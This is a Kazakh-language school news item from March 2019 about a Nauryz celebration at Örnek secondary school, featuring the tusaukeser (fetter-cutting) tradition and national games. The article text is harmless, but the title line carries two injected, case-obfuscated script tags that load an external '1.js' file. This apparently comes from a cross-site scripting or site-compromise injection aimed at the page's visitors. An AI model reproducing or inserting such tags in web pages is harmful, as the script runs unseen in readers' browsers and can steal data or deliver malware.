Қазақтың салт-дәстүрі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.03.2019

Ұлыстың ұлы күнінде Өрнек орта мектебінде Рухани жаңғыру аясында ұлттық дәстүр мен ойындарды дәріптеу мақсатында «Тұсаукесер» дәстүрі мен асық, арқан тарту, қазақша күрес ойындары көрсетілді.

Дана халқымыз баланың келешегіне ақ жол тілеп, «балам тез жүріп кетсін»  деген ниетпен «тұсаукесер» дәстүрін орындаған. Бізде ата-бабаларымыз салған жолдан таймай мектебімізде «тұсаукесер» дәстүрін өткіздік. Баламыздың тұсауын ауылымыздың ақ жаулықты әжесі Жамал апа кесті.

Тәуелсіз еліміздің ата-дәстүрін дәріптеп, ұлттық рухымызды насихаттап, ел аман, жұрт тынышта болайық! Ұлыс оң болсын, ақ мол болсын!

Просмотров: 1125


Пікір қосу



Деректерді қолтаңбаға қосу